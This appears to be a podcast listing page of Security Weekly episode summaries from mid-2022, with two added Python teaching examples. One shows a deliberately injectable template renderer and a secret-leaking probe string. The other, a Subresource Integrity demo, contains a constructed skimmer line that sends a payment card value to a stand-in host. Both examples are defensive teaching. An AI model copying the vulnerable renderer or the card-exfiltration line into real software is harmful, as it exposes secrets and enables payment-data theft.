Paul's Security Weekly TV


Security news, interviews, how-to technical segments. For security professionals by security professionals. We Hack Naked.

Security Weekly


    • Latest episode: Jun 28, 2022
    • New episodes: daily
    • Average duration: 38m
    • Episodes: 3,138



    Latest episodes from Paul's Security Weekly TV

    More Fuzzing, a Decade of OT Security, & Top Threats to Cloud Computing - ASW #202

    Jun 28, 2022 (37:58)

    This week in the AppSec News: lessons learned from fuzzing, the OT:ICEFALL report on insecure designs, CSA's Top Threats to Cloud Computing, Twitter apologizes for misusing collected data, and the State of Open Source Security report.

    Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw202

    How GraphQL & Template Injection Threats Influence App Architectures - Mike Benjamin - ASW #202

    Jun 27, 2022 (37:21)

    Both GraphQL and template engines open the door to injection attacks, from exposing data through weak authorization in APIs to the slew of OGNL-related vulns in Java this past year. We take a look at both technologies to understand the similarities in what can go wrong, while also examining the differences in how each one influences modern application architectures.

    Show Notes: https://securityweekly.com/asw202
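    The template-engine half of that discussion, as an added example that is not code from the episode or its guest: Python's str.format stands in for a template language whose "{a.b}" lookups play the role that OGNL expressions play in Java templates, a constructed Settings object stands in for application config, and the same greeting feature is rendered twice, once with the user's text as part of the template (the vulnerable pattern) and once with the user's text as a value in a fixed template.

```python
"""Template injection: untrusted text used as the template versus as data.

Added example for this page; not code from the episode or any project.
Python's str.format stands in for a template engine whose "{a.b}" lookups
play the role of OGNL expressions in Java templates. Settings and its
values are constructed for the demo.
"""
import string


class Settings:
    """Constructed stand-in for application config that templates may reference."""

    def __init__(self) -> None:
        self.site_name = "Constructed Shop"       # meant to be template-visible
        self.db_password = "constructed-secret"   # never meant to be rendered


SETTINGS = Settings()


def render_greeting_unsafe(user_text: str, name: str) -> str:
    """Vulnerable (intentionally so): the user's text becomes part of the template.

    The feature is legitimate: store owners write greetings such as
    "Welcome to {settings.site_name}". But str.format resolves any attribute
    chain, so "{settings.db_password}" reads the secret from the same object.
    """
    template = "Hello, {name}! " + user_text
    return template.format(name=name, settings=SETTINGS)


def render_greeting_safe(user_text: str, name: str) -> str:
    """Fixed: the outer template is a constant and the user's text is only a value.

    string.Template substitutes bare $identifiers and nothing else, and it does
    not re-scan substituted values, so braces or dollar signs in the user's text
    are echoed verbatim instead of being evaluated. The legitimate feature stays:
    an explicit allow-list of plain values (here only site_name) is exposed,
    never the config object itself.
    """
    allowed = {"site_name": SETTINGS.site_name}
    message = string.Template(user_text).safe_substitute(allowed)
    outer = string.Template("Hello, $name! $message")
    return outer.safe_substitute(name=name, message=message)


if __name__ == "__main__":
    probe = "{settings.db_password}"            # attacker-supplied greeting
    print("unsafe:", render_greeting_unsafe(probe, "eve"))
    print("safe:  ", render_greeting_safe(probe, "eve"))
```

    The unsafe variant leaks the secret because the engine evaluates whatever expression the user wrote; a longer chain such as "{settings.__class__.__init__.__globals__}" walks out of the object into module globals. The fix is not escaping but separation: the template is fixed, the user contributes data, and anything a template may legitimately reference is passed in as an individual value rather than as an object with attributes to traverse.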

    Stopping Phishing Attacks & A Fresh Approach to Reducing Cyber Risk - Chris Cleveland, Mehul Revankar - ESW #278

    Jun 25, 2022 (32:43)

    PIXM stops phishing attacks at the point of click with computer vision in the browser, protecting users from phishing beyond the mailbox in any application. With the launch of PIXM Mobile, PIXM now delivers this capability on iPhones as well as desktop devices.

    Segment Resources: https://pixmsecurity.com/mobile/

    This segment is sponsored by Pixm. Visit https://securityweekly.com/pixm to learn more about them!

    The rise in disclosed vulnerabilities, the speed at which they are weaponized, and the cyber talent shortage have left teams struggling to wade through a mountain of vulnerabilities. In this discussion, Mehul will discuss the need for a new way to cut through the noise and focus teams on prioritizing and fixing the critical vulnerabilities that will most reduce risk in each organization's environment. He'll also cover how Qualys is redefining risk and vulnerability management in the latest version of VMDR and share stories of how customers have leveraged this solution to dramatically reduce risk.

    Segment Resources: www.qualys.com/trurisk www.qualys.com/vmdr

    This segment is sponsored by Qualys. Visit https://securityweekly.com/qualys to learn more about them!

    Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw278

    IBM Acquires Randori, Quantum Devices, Microsoft Defender, & RapidFort - ESW #278

    Jun 25, 2022 (40:29)

    In the Enterprise Security News: CyberInt raises $28M for attack surface detection, RapidFort raises $8.5M for… pre-attack surface detection? Managing and monitoring your quantum devices, making sure you don't lose access to your crypto wallets, IBM acquires Randori, Contrast Security makes some of their tools free, Rumble adds more interesting new features, Microsoft Defender for everyone, and more!

    Show Notes: https://securityweekly.com/esw278

    Plastic Bags, NSA Playsets, Megs Insecure, PHP Strikes Back, & Gamification - PSW #745

    Jun 24, 2022 (117:23)

    In the Security News for this week: appliances with holes, gamification and its pitfalls, false rocket sirens, PHP strikes again, new laws we may actually agree with, hacking jacuzzis, Icefall and the state of ICS security, Adobe is blocking anti-virus, Mega is Mega insecure, the Microcorruption CTF, and a DIY NSA playset!

    Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw745

    Breaking Through Vendor Barriers: Product Data as a Service - Tim Morris - ESW #278

    Jun 24, 2022 (41:22)

    Introducing the concept of Tanium Data as a Service. When you've got a product like Tanium, which collects so much useful data, why would you want to keep it within Tanium? The Data-as-a-Service model aims to increase the value of the Tanium product by safely sharing its data with other teams, tools, and groups within a customer's organization.

    This segment is sponsored by Tanium. Visit https://securityweekly.com/tanium to learn more about them!

    Show Notes: https://securityweekly.com/esw278

    Lacework Layoffs, Anti-Hacking Law, The Security Study Plan, & StackZone - ESW #275

    Jun 24, 2022 (49:56)

    This week in the Enterprise News: Lacework lays off approximately 300 employees, the US narrows the scope of an anti-hacking law long hated by critics, the Security Study Plan, DevSecOps vulnerability management by Guardrails, StackZone, Cipherloc acquires vCISO security services provider SideChannel, Broadcom to buy VMware for $61 billion in a record tech deal, Cyscale raises EUR 3 million in a seed funding round, and more!

    Show Notes: https://securityweekly.com/esw275

    Learning Should Be Fun - Sam Bowne - PSW #745

    Jun 24, 2022 (66:18)

    Many people think security is too difficult to learn because it is such a big field, and constantly growing. But it's endlessly fascinating and surprising, once you learn some fundamentals and get used to feeling stupid. My task is to help people get started, and learn how to appreciate this complex and challenging topic.

    Segment Resources: https://samsclass.info/ https://infosecdecoded.com/

    Show Notes: https://securityweekly.com/psw745

    The 3 Ts (Truth, Transparence, Trust), 4 Leadership Strategies, & 5 Best Predictors - BSW #264

    Jun 22, 2022 (30:51)

    In the Leadership and Communications section: the Uber CISO's trial underscores the importance of truth, transparency, and trust; 4 leadership strategies to help women advance in the tech industry; 5 best predictors of employee turnover and what leaders should do about them; and more!

    Visit https://www.securityweekly.com/bsw for all the latest episodes! Show Notes: https://securityweekly.com/bsw264

    Hertzbleed, SynLapse, Java Deserialization, More MFA, Firmware Flaws, & Zombie 0-Day - ASW #201

    Jun 22, 2022 (31:15)

    This week in the AppSec News: SynLapse shows shell injection via ODBC, a Java deserialization example, MFA for the RubyGems ecosystem, simple flaws in firmware, the decade-long journey of a Safari vuln, and more!

    Show Notes: https://securityweekly.com/asw201

    IE11 Goes to Zero -- A History of Browser Security and Bug Bounties - ASW #201

    Jun 21, 2022 (32:52)

    IE has gone to 11 and is no more. There's some notable history relating IE11 to bug bounty programs. In 2008, Katie Moussouris and others from Microsoft announced their vulnerability disclosure program. In 2013 this evolved into a bug bounty program piloted with IE11, with awards ranging from $500 to $11,000. Nearly ten years later, that bounty range is still common across the industry. The technical goals of the program remain similar as well: RCEs, universal XSS, and sandbox escapes are all vulns that can easily earn $10,000+ (or an order of magnitude more) in modern browser bounty programs. So, even if we've finally moved on from a browser with an outdated security architecture, we're still dealing with critical patches in modern browsers. Fortunately, the concept of bounty programs continues.

    References:
    - https://www.blackhat.com/presentations/bh-usa-08/Reavey/MSRC.pdf
    - https://media.blackhat.com/bh-usa-08/video/bh-us-08-Reavey/black-hat-usa-08-reavey-securetheplanet-hires.m4v
    - https://web.archive.org/web/20130719064943/http://www.microsoft.com/security/msrc/report/IE11.aspx
    - https://web.archive.org/web/20190507215514/https://blogs.technet.microsoft.com/bluehat/2013/07/03/new-bounty-programs-one-week-in/

    Show Notes: https://securityweekly.com/asw201

    The Board's Role In Cybersecurity - Brandon Dunlap - BSW #266

    Jun 19, 2022 (25:17)

    With recent proposed rulemaking from the SEC, there is increased focus on the Board's involvement in governing and managing cybersecurity. What is changing in how effective CISOs engage with their Board of Directors, and what is over the horizon for cybersecurity leaders?

    Show Notes: https://securityweekly.com/bsw266

    Inside the CISO's Office - John Bruggeman - BSW #266

    Jun 18, 2022 (30:30)

    What does a CISO do all day? Do they eat bon-bons and read the WSJ? Do they read Threatpost or BleepingComputer or Twitter? Why does a company need a CISO, or better still, do they need one? All these questions and more will be answered in this week's episode.

    Segment Resources: https://www.cbts.com/security/security-services/ https://www.cbts.com/blog/cloud-security-controls-mitigate-risk/ https://www.cbts.com/blog/weighing-risks-benefits-moving-to-the-cloud-part-1/ https://www.cbts.com/blog/what-is-cyber-insurance/

    Show Notes: https://securityweekly.com/bsw266

    Transforming Cybersecurity Marketing & How the Internet Became Corporate Network - Amit Bareket, Gianna Whitver - ESW #277

    Jun 18, 2022 (31:16)

    We will cover high-level winning strategies in cybersecurity marketing: the do's and don'ts for our specific industry and the key factors of success in a go-to-market strategy.

    Segment Resources: https://cybersecuritymarketingsociety.com/podcast/ https://insight.cybersecuritymarketingsociety.com/survey2021

    This segment is sponsored by Perimeter 81. Visit https://securityweekly.com/perimeter81 to learn more about them!

    Two important shifts over the last two years transformed what we once knew as an on-premise ecosystem into a global system accessible from anywhere. One is remote work, which began as a temporary measure to get us through the early days of the pandemic and has since become the norm. The other is cloud adoption, which was mainstream even before the pandemic but has seen another bump in the last two years. As a result, the internet has become the new corporate network. Where do we go from here?

    This segment is sponsored by Perimeter 81. Visit https://securityweekly.com/perimeter81 to learn more about them!

    Show Notes: https://securityweekly.com/esw277

    The Evolving Phishing Threat & Protect Valuable Data as Workforce Volatility Rages - ESW #277

    Jun 18, 2022 (33:11)

    Phishing attacks are increasingly focused on new vectors such as social media, business collaboration apps, and text messages. These vectors generally lack any protection for the end user. How can we protect against these attacks that are increasingly leading to costly breaches?

    This segment is sponsored by Pixm. Visit https://securityweekly.com/pixm to learn more about them!

    Employee turnover is the biggest threat to any organization's IP. Nearly 60% of employees move to a new company within similar fields (think: competitors) and are using collaboration technology to take sensitive data at an alarming rate. Code42's Joe Payne will discuss how Insider Risk Management addresses data loss in a volatile job market while still enabling collaboration.

    This segment is sponsored by Code42. Visit https://securityweekly.com/code42 to learn more about them!

    Show Notes: https://securityweekly.com/esw277

    Big DDOS, Tracking Smartphones, BIOS Doom, NSO Buyer, & Android Children - PSW #744

    Jun 17, 2022 (103:22)

    This week in the Security News: big DDoS, tracking smartphones, play Doom in your BIOS, Hertzbleed, an Apple M1 vulnerability, who will buy NSO, spoof your location data, building system attacks, and a hacker's revenge!

    Show Notes: https://securityweekly.com/psw744

    Azure Vulns, Vendor Layoffs, Rob Lee, & Bye Bye Internet Explorer - ESW #277

    Jun 17, 2022 (70:59)

    This week, in the Enterprise News:

    • Vanta raises a $110M Series B to automate SOC 2, ISO, PCI and other compliance efforts
    • Immuta raises a $100M Series E for secure data access (an everything-old-is-new-again market that's exploding)
    • Perimeter 81 raises a $100M Series C and becomes a unicorn: you get a VPN! I get a VPN! Everyone gets a VPN!
    • Over a dozen other vendors raise funding
    • IBM acquires EASM vendor Randori
    • Another Azure vulnerability allowing tenancy escapes
    • Microsoft's Purview goes beyond DLP and gets into the pre-crime business
    • Half a dozen cybersecurity vendor layoff announcements
    • The controversy around Rob Lee's involvement with developing federal standards for critical infrastructure protection
    • Farewell (and good riddance) to Internet Explorer… but not really

    After the news, we air some segments recorded at the RSA conference last week.

    Show Notes: https://securityweekly.com/esw277

    We Help The Helpers; You Can Too! - Ray Davidson - PSW #744

    Jun 17, 2022 (59:16)

    Michigan has a group of volunteers who assist local governments and public services with incident response. The program is relatively mature, and will be presented (along with those of Ohio and Wisconsin) at the upcoming National Governors Association Cybersecurity Summit. Come hear the interview and scoop the governors!

    Segment Resources:
    - Home page: http://micybercorps.org
    - Supporting legislation: https://www.legislature.mi.gov/documents/mcl/pdf/mcl-Act-132-of-2017.pdf
    - Partner organization: https://www.michigan.gov/dtmb/services/cybersecurity/cyber-partners
    - Key article in moving the program's development forward: https://warontherocks.com/2018/01/estonias-approach-cyber-defense-feasible-united-states/
    - An article with more info: https://www.lawfareblog.com/bridging-state-level-cybersecurity-resources

    Show Notes: https://securityweekly.com/psw744

    OWASP Top 10 for K8s, Firefox Process Isolation, Secure Software Factory, CFAA Policy - ASW #198

    Jun 15, 2022 (35:01)

    This week in the AppSec News: OWASP Top 10 for Kubernetes, Firefox improves security with process isolation, CNCF releases guidance on Secure Software Factories and Cloud Native Security, and the DOJ clarifies its policy on the CFAA!

    Show Notes: https://securityweekly.com/asw198

    The Psychology of Training - Matias Madou - ASW #198

    Jun 15, 2022 (36:48)

    Developers want bug-free code: it frees up their time and is easier to maintain. They want secure code for the same reasons. We'll talk about how the definition of secure coding varies among developers and appsec teams, why it's important to understand those perspectives, and how training is just one step towards building a security culture.

    Show Notes: https://securityweekly.com/asw198

    Defining Cyber Risk & Is the Market Ready for Integrated Cyber Risk Management? - BSW #265

    Jun 14, 2022 (29:49)

    Defining Cyber Risk with Bryan Ware: This year, RSAC is happening amidst the backdrop of major geopolitical tensions with cyber impacts; a continued, lingering pandemic and a potential economic downturn that cyber adversaries can and have leveraged to their benefit; and increasing technological innovation. All of this points toward ever-evolving cyber risk. What are some of the key considerations that executives, both ones with cyber expertise and ones without, should keep in mind as they look to not only define cyber risk but also reduce it and ensure operational resiliency? In this segment, we'll hear thoughts from Bryan Ware, the new CEO of LookingGlass Cyber Solutions, former CEO of Next5, a business intelligence and advisory firm, and the first presidentially appointed Assistant Director of Cybersecurity at the Cybersecurity and Infrastructure Security Agency (CISA) at the Department of Homeland Security (DHS).

    This segment is sponsored by LookingGlass Cyber. Visit https://securityweekly.com/lookingglass to learn more about them!

    Is the Market Ready for Integrated Cyber Risk Management? Cyber risk management is now a dynamic practice for security teams and leadership. It requires up-to-date risk intelligence across many factors (external, internal, third parties, cloud posture) to inform the right decisions and enable cyber risk quantification and risk modeling to be more dynamic. Victor will discuss what drove him to leave security leadership and start a company to solve the problems he experienced with cyber risk management, and how the market is responding.

    Segment Resources: https://fortifydata.com/request-an-assessment

    This segment is sponsored by FortifyData. Visit https://securityweekly.com/fortifydata to learn more about them!

    Show Notes: https://securityweekly.com/bsw265

    What's Happening with SCIM - Paul Lanzi - ESW #275

    Jun 14, 2022 (28:49)

    There are a few standards that make the identity world go 'round. SAML, FIDO and LDAP are ones that we know and love... but there's one particularly un-loved standard, SCIM (the IETF's System for Cross-domain Identity Management), that is the glue between most identity systems out there, cloud and on-prem alike. The good news is that smart people are working on improving this 10+ year old standard. Big changes are coming, and here to talk with us about it is Paul Lanzi...

    Segment Resources: https://identiverse.com/idv2022/ (Paul on Wednesday)

    Show Notes: https://securityweekly.com/esw275

    RSAC Micro Interviews - Cisco & Invicti Security - Jeetu Patel, Sonali Shah - ASW #200

    Jun 14, 2022 (31:50)

    Seamlessly Connect & Protect the Entire IT Ecosystem: The new business reality is that everything is connected, and everyone is vulnerable. In today's world, security resilience is imperative, and Cisco believes it requires an open, unified security platform that crosses hybrid multi-cloud environments. Our vision for the Cisco Security Cloud will reshape the way organizations approach and protect the integrity of the entire IT ecosystem.

    Segment Resources: Cisco Security Resilience: https://www.cisco.com/c/en/us/products/security/security-resilience.html

    This segment is sponsored by Cisco. Visit https://securityweekly.com/cisco to learn more about them!

    The Culture Blindspot: Harmonizing DevSecOps Helps Curb Burnout: Recent data shows that security and development teams are still stressed, and they're taking that stress home with them. Not only are they spending unnecessary hours addressing security issues that they could have otherwise prevented with modern tools and best practices, but these teams are also taking time out of their personal lives during holidays and on weekends to manage critical issues, contributing to burnout and ultimately churn. There's good news, though: relationships between security and development are steadily improving, and with the right support and modern tooling at hand, you can transform the lives of cybersecurity professionals while also boosting your organization's security posture.

    This segment is sponsored by Invicti. Visit https://securityweekly.com/invicti to learn more about them!

    Show Notes: https://securityweekly.com/asw200

    Boards & Cybersecurity, The New CISO Role, & Reskilling - BSW #265

    Jun 14, 2022 (32:04)

    In the Leadership and Communications section: being concerned is not enough (what boards should know and do about cybersecurity), in the case of cybersecurity the best defense is education, reskilling workers can help meet the cybersecurity staffing challenge, and more!

    Show Notes: https://securityweekly.com/bsw265

    HTTP RFCs Have Evolved, Breaking Into Cloud, Scaling AppSec at Netflix, & Confluence - ASW #200

    Jun 13, 2022 (36:45)

    HTTP RFCs have evolved: a Cloudflare view of HTTP usage trends; career advice and professional development; active exploitation of Confluence CVE-2022-26134.

    Show Notes: https://securityweekly.com/asw200

    Accelerating Security Response - Bill Bernard - ESW #275

    Jun 3, 2022 (36:12)

    In our research, 85% of security professionals attribute preventable business impacts to insufficient response practices. In this segment, Bill will discuss the key challenges slowing down response times, with staffing, alert quality, and organizational culture as the primary factors.

    This segment is sponsored by deepwatch. Visit https://securityweekly.com/deepwatch to learn more about them!

    Show Notes: https://securityweekly.com/esw275

    The Data Dilemma: Securing All Data at Scale - Dan Neault - BSW #264

    Jun 3, 2022 (33:23)

    Data is the most valuable resource on the planet; but, as businesses collect and store data at an astonishing pace, data sprawl, volume, and diverse storage environments create a security nightmare. With support for hundreds of data stores across leading cloud providers and thousands of automation and response integrations, Imperva Data Security Fabric modernizes and simplifies data governance, security, and workflow management for data in all forms across multicloud and hybrid environments. The product's flexible architecture supports structured, semi-structured, and unstructured data across a range of data repositories to ensure security policies are applied consistently everywhere, so businesses can quickly understand and mitigate risk.

    This segment is sponsored by Imperva. Visit https://securityweekly.com/imperva to learn more about them!

    Show Notes: https://securityweekly.com/bsw264

    ReliaQuest, Mimecast Delisted, 57th Unicorn, Expired Certs, & CyberSec Skill Crisis - ESW #276

    Jun 3, 2022 (63:58)

    In the Enterprise Security News: funding is back, in preparation for RSA! Devo raises $100M and becomes our 56th unicorn, JupiterOne raises $70M and becomes our 57th unicorn, open source projects get some security funding, 10 more funding announcements, Mimecast has been taken private and is now delisted from the NASDAQ, ReliaQuest acquires Digital Shadows, we talk about public and private market performance, the cybersecurity skills crisis gets worse, expired certs + IoT devices = PAIN! All that and more, on this episode of Enterprise Security Weekly.

    Show Notes: https://securityweekly.com/esw276

    Understanding WebApp Client-Side Security With Source Defense - Matt McGuirk - PSW #743

    Jun 3, 2022 (58:46)

    This segment will be an opportunity to discuss web application client-side security with subject matter expert Matt McGuirk from Source Defense. Modern web applications have a massive and misunderstood attack surface that exists within the webpages they serve.

    Potential discussion topics:
    - A visual overview of the problem
    - A simulated client-side attack
    - How to evaluate client-side risk on a given web site
    - What technologies are available to defend against client-side attacks
    - Historical case studies of landmark attacks

    Segment Resources:
    - "Magecart 101", a courseware-style overview of the problem for security practitioners: https://www.youtube.com/watch?v=T4al8idAE_M
    - A quick five-minute explainer on the problem and Source Defense's solution: https://www.youtube.com/watch?v=f8MO45EQcKY
    - Source Defense's brand new (as of 5/25/22) "State of the Industry" report for client-side security: https://info.sourcedefense.com/third-party-digital-supply-chain-report-white-paper

    This segment is sponsored by Source Defense. Visit https://securityweekly.com/sourcedefense to learn more about them!

    Show Notes: https://securityweekly.com/psw743

    Charitable Ransomware, Year of Linux Malware, Follina MSDT, Twitter Fines, & Bounties - PSW #743

    Jun 3, 2022 (111:20)

    This week in the Security News: analyzing chat logs with Python, consumer reports for IoT, hypothetically BS, the year of the Linux desktop and the year of Linux malware are the same, do you trust Google to tell you open-source software is secure?, Twitter fines, a WSL attack vector, Follina, the UK Government still won't pay a bounty, and ransomware that makes you a better person!

    Show Notes: https://securityweekly.com/psw743

    Salesforce's Journey Towards Complete Customer MFA - Ian Glazer - ESW #276

    Jun 3, 2022 (22:47)

    In the autumn of 2019, Salesforce started on an ambitious journey: to require all of their customers to use multi-factor authentication (MFA) as of February 2022. The journey required the collaboration of every product line and every business function within Salesforce. And the journey potentially required every single one of Salesforce's customers to deploy new technology and to change all of their users' behavior. Clearly this would be no simple journey, but it was one with massive rewards for everyone involved. Join Ian Glazer as he discusses the impetus for Salesforce's MFA push, the challenges of such a large-scale endeavor, some of the setbacks and victories along the way, and, most importantly, what you can take from Salesforce's journey towards complete customer MFA adoption and apply in your own organization.

    Show Notes: https://securityweekly.com/esw276

    CEOs - Do You Know Where That Cyber Risk Report Came From? - Jerry Layden, Kevin Powers - BSW #263

    Jun 2, 2022 (25:56)

    Boards and CEOs are asking what their cyber risk posture is, and they aren't getting clear answers. Reports produced from assessments are often built on stale data rather than real-time compliance and risk data. How should C-levels be thinking about cybersecurity posture reporting, and how can they manage cyber risk in real time as opposed to point in time?

    This segment is sponsored by CyberSaint. Visit https://securityweekly.com/cybersaint to learn more about them!

    Show Notes: https://securityweekly.com/bsw263

    CISO MindMap 2022, Top CISO Strategies, & The Missing Link in Cybersecurity - BSW #263

    Jun 2, 2022 (32:16)

    In the Leadership and Communications section: CISO MindMap 2022 (what do InfoSec professionals really do?), a CISO shares top strategies to communicate security's value to the business, security leaders chart new post-CISO career paths, and more!

    Show Notes: https://securityweekly.com/bsw263

    Understanding Web Application Client-Side Risk - Matt McGuirk - ESW #276

    Jun 2, 2022 (33:33)

    Web applications have a new and dangerous security gap which requires attention: client-side security. The code and content that a web application delivers into a web browser is a ripe attack surface and requires different consideration, tools, and knowledge than traditional web application security. This segment will explore what client-side security is, why client-side attacks are so dangerous, and what options are available to defend ourselves from this new threat.

    Segment Resources:
    - "Magecart 101", a courseware-style overview of the problem for security practitioners: https://www.youtube.com/watch?v=T4al8idAE_M
    - A quick five-minute explainer on the problem and Source Defense's solution: https://www.youtube.com/watch?v=f8MO45EQcKY
    - Source Defense's brand new (as of 5/25/22) "State of the Industry" report for client-side security: https://info.sourcedefense.com/third-party-digital-supply-chain-report-white-paper

    This segment is sponsored by Source Defense. Visit https://securityweekly.com/sourcedefense to learn more about them!

    Show Notes: https://securityweekly.com/esw276
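    One concrete option for defending against the script-swapping attacks that both Source Defense segments on this page (PSW #743 and ESW #276) are about is Subresource Integrity. The following is an added example, not code from Source Defense or from either episode: it generates the integrity attribute a site ships for a third-party script and mirrors the check a browser performs on the fetched body, so a skimmer-modified copy of the script is refused instead of executed. The script body, the CDN URL and the exfiltration host are constructed for the demo.

```python
"""Subresource Integrity (SRI) as a defence against Magecart-style script swaps.

Added example for this page; not code from Source Defense or the episode.
The script bodies and URLs below are constructed for the demo.
"""
import base64
import hashlib
import hmac

# Digest algorithms browsers honour in an integrity attribute, weakest first.
SRI_ALGOS = ("sha256", "sha384", "sha512")


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Return the integrity token ("sha384-<base64 digest>") for a script body."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, body: bytes, algo: str = "sha384") -> str:
    """Build the <script> tag a site ships for a pinned third-party script.

    crossorigin="anonymous" matters: without CORS the browser cannot read a
    cross-origin response body to hash it, and a script that carries an
    integrity attribute but cannot be verified is not executed.
    """
    return (f'<script src="{src}" integrity="{sri_hash(body, algo)}" '
            'crossorigin="anonymous"></script>')


def integrity_matches(body: bytes, integrity: str) -> bool:
    """Mirror the browser's decision for a fetched script body.

    The attribute may carry several space-separated tokens. Tokens with an
    unknown algorithm are ignored; if none remain, SRI is not enforced at all
    (a browser behaves the same way, which is why a typo in the attribute is
    silently fatal to the defence). Otherwise only tokens using the strongest
    listed algorithm count, and any one of them matching is a pass.
    """
    tokens = [t for t in integrity.split() if t.split("-", 1)[0] in SRI_ALGOS]
    if not tokens:
        return True
    strongest = max((t.split("-", 1)[0] for t in tokens), key=SRI_ALGOS.index)
    expected = sri_hash(body, strongest)
    return any(hmac.compare_digest(t, expected)
               for t in tokens if t.startswith(strongest + "-"))


if __name__ == "__main__":
    # Constructed sample: the vendor's checkout helper, then a skimmer-modified copy.
    original = b"document.querySelector('#pay').addEventListener('submit', collectCard);"
    tampered = original + b"fetch('https://exfil.example/?c=' + document.forms[0].card.value);"
    pinned = sri_hash(original)
    print(script_tag("https://cdn.example/checkout.js", original))
    print("original accepted:", integrity_matches(original, pinned))
    print("tampered accepted:", integrity_matches(tampered, pinned))
```

    The caveats a practitioner should keep in mind: SRI pins one exact file, so it breaks (fails closed, which is the point) whenever the third party ships an update, and it says nothing about code the pinned script itself loads at runtime or about inline scripts. That gap between a static pin and what actually runs in the checkout page is where Content Security Policy and runtime monitoring of the DOM come in.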

    Evil Encryption, CyberSec Funding, Market Downturns, & Crypto Muggings - ESW #274

    May 21, 2022 (39:35)

    In the Enterprise Security News: the latest cybersecurity fundraising, we discuss the impact of the market downturn on the cybersecurity startup industry, crypto muggings, security researchers researching researchers simulating attackers, and evil encryption!

    Show Notes: https://securityweekly.com/esw274

    Windows GPU Display Vulns, NFT Discord Hack, Costa Rica Vs. Hackers, & Initial Access - PSW #741

    May 21, 2022 (77:01)

    In the Security News for this week: Singapore launches a safety rating system for e-commerce sites, watch out for the Zyxel firewalls RCE vulnerability, a new Bluetooth hack that can unlock your Tesla, hackers compromise a string of NFT Discord channels, a pentester's attempt to be "as realistic as possible" backfires, and more!

    Show Notes: https://securityweekly.com/psw741

    Where to Start Your Passwordless Journey? - Jackie Comp, Rolf Lindermann - ESW #274

    May 21, 2022 (44:06)

    Migrating off passwords and legacy authentication is a journey. Nok Nok has worked with global brands to incorporate passwordless, next-generation authentication into their consumer apps, leading to significant improvements in onboarding, authentication success and speed, and a reduction in fraud, among many other benefits. Learn how these organizations have mastered the transition.

    Segment Resources: www.noknok.com https://www.youtube.com/watch?v=yQIwOx2XCSE

    Show Notes: https://securityweekly.com/esw274

    Attack Intelligence, Collective Defense, & Trends to Watch - Michael Ehrlich - ESW #274

    Play Episode Listen Later May 20, 2022 32:57

    Attack intelligence delivers customers actionable, relevant, and timely information. Learn why Collective Defense is an integral aspect of attack intelligence and hear about the cyber trends you need to watch.   Segment Resources: https://www.ironnet.com/blog/what-is-attack-intelligence-and-why-do-you-need-it   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw274

    Firmware Security - Saumil Shah - PSW #741

    Play Episode Listen Later May 20, 2022 59:24

    In this segment Saumil Shah joins us for a discussion on Firmware Security, complete with a fascinating first-hand demonstration!   Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw741

    Year in Cyber Review 2021 - Robert Lee - PSW #741

    Play Episode Listen Later May 19, 2022 57:21

    The past year has been filled with incredible changes in the cyber security landscape from ICS, Mobile, Cloud, and increased threats from Ransomware. This discussion will focus on crucial and quick discussions surrounding the cyber landscape that has changed quickly and forced organizations to consider revamping many of their policies and preparations. Join us for a humorous, and insightful journey back over the past year filled with examples for practitioners, organizations, and those just starting in cyber security.   Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw741

    Typosquatting, Curl's Security Update, & OpenSSF's 10 Point Mobilization Plan - ASW #197

    Play Episode Listen Later May 18, 2022 40:22

    This week in the AppSec News: Typosquatting spreads to Rust, curl fixes flaws in mishandling dots and slashes, OpenSSF invests in a mobilization plan for open source, interesting appsec from Black Hat Asia.    Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw197

    Developing Future Cybersecurity Contributors - Brian Glas - ASW #197

    Play Episode Listen Later May 18, 2022 39:26

    What does it look like to try teaching cybersecurity at an undergraduate level? What are the goals and challenges faced when trying to help future generations learn what they need to know to contribute to this industry?    Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw197

    Becoming a Year Younger, Material Security, Tailscale, Radiflow, & Arctic Wolf - ESW #273

    Play Episode Listen Later May 14, 2022 39:59

    In the Enterprise News for this week: Funding announcements from Material Security, Abnormal, Teleport, Tailscale, Smallstep, Phylum and more. Acquisitions include HDiv Security, and Radiflow. New product announcements from Siren, Corelight, Arctic Wolf, Onapsis and Aqua. And, in other news, all South Koreans are about to become one year younger, & more!   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw273

    Overcoming Challenges in Multinational Phishing Simulations - Omer Taran - ESW #273

    Play Episode Listen Later May 14, 2022 32:07

    According to CybeReady, during such turbulent times, one should regard all emails with extra caution and double-check the sender's address carefully. Beware of requests that ask for technical assistance such as running software or helping to take down websites. These might not only be illegal but may also be used to hack systems on the corporate network. Try to remember that during times of crisis, there is an increase in phishing attempts of all kinds as hackers take advantage of the situation. In this circumstance, employees need to stay updated from both a news and computing perspective. To be proactive in the defense of computing environments, our security experts recommend: 1. Personal computers and phones: Install the latest operating system and security updates. 2. Implement 2FA/MFA: Use a phone number or authentication app as the second factor of authentication for all important applications, social media accounts (Facebook/Meta, LinkedIn, Twitter, etc.), and personal email accounts. Back up email and ensure it is recoverable. 3. Change Passwords: If you are reusing a password on sites that hold your personal information, it is a good time to change your passwords. 4. Support a Culture of Security: Train your employees continuously, advise friends and family to do the same, and take an active role in creating a safer internet. 5. Defend Work from Home Environments: Install the operating system and security updates. If these are available you should see a notification on your computer or phone. Especially important to business continuity in these times of uncertainty is the need for automated cybersecurity training that adapts to employee educational needs and accelerates the learning process.   Segment Resources: https://cybeready.com/blog https://cybeready.com/resource-center/playbook https://cybeready.com/ultimate-guide-to-phishing-protection   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw273

    Public Entities & Ransomware, Colonial Pipeline Fine, Nvidia's LHR Limiter, & BIG-IP - PSW #740

    Play Episode Listen Later May 13, 2022 104:04

